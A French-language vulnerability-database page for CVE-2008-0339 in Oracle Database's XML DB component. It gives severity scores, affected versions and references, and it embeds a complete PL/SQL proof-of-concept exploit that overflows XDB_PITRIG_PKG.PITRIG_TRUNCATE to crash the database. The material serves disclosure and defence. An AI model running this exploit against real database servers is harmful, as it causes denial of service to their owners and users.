CVE-2008-0339 : Détail

CVE-2008-0339

47.32%V3
Network
2008-01-17
21h00 +00:00
2008-01-23
09h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Unspecified vulnerability in the XML DB component in Oracle Database 9.2.0.8, 9.2.0.8DV, 10.1.0.5, and 10.2.0.3 has unknown impact and remote attack vectors, aka DB01.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE Other No informations.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 31010

Date de publication : 2008-01-09 23h00 +00:00
Auteur : sh2kerr
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/27229/info Oracle has released its critical patch update for January 2008. The advisory addresses 26 vulnerabilities affecting Oracle Database, Oracle Application Server, Oracle Collaboration Suite, Oracle E-Business Suite, Oracle Enterprise Manager, and Oracle People Soft Enterprise. The issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly compromise affected computers. /******************************************************************/ /******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/ /******* BUFFER OVERFLOW *********/ /******************************************************************/ /************ POC exploit , Crash database **************/ /******************************************************************/ /****************** BY Sh2kerr (Digital Security) ***************/ /******************************************************************/ /***************** tested on oracle 10.1.0.2.0 *******************/ /******************************************************************/ /******************************************************************/ /* Date of Public EXPLOIT: January 28, 2008 */ /* Written by: Alexandr "Sh2kerr" Polyakov */ /* email: Alexandr.Polyakov@dsec.ru */ /* site: http://www.dsec.ru */ /******************************************************************/ /* Original Advisory by: */ /* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */ /* Reported: 18 Dec 2007 */ /* Date of Public Advisory: January 15, 2008 */ /* Advisory: http://www.oracle.com/technology/deploy/ */ /* security/critical-patch-updates/cpujan2008.html */ /* */ /******************************************************************/ /* thanks to oraclefun for his pitrig_dropmetadata exploit */ /* */ /******************************************************************/ set serveroutput on declare buff varchar2(32767); begin /* generate evil buffer */ buff:='12345678901234567890123456789'; buff:=buff||buff; buff:=buff||buff; buff:=buff||buff; buff:=buff||buff; buff:=buff||buff; buff:=buff||'0012345678901234567890123sh2kerr'; /* lets see the buffer size */ dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); end; / /* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */ /******************************************************************/ /*************************** SEE U LATER ;) ***********************/ /******************************************************************/

Products Mentioned

Configuraton 0

Oracle>>Database_server >> Version 9.2.0.8dv

Oracle>>Database_server >> Version 10.1.0.5

Oracle>>Database_server >> Version 10.2.0.3

Références

http://securitytracker.com/id?1019218
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/27229
Tags : vdb-entry, x_refsource_BID
http://www.us-cert.gov/cas/techalerts/TA08-017A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.vupen.com/english/advisories/2008/0150
Tags : vdb-entry, x_refsource_VUPEN
http://www.vupen.com/english/advisories/2008/0180
Tags : vdb-entry, x_refsource_VUPEN
http://marc.info/?l=bugtraq&m=120058413923005&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=120058413923005&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/28556
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/28518
Tags : third-party-advisory, x_refsource_SECUNIA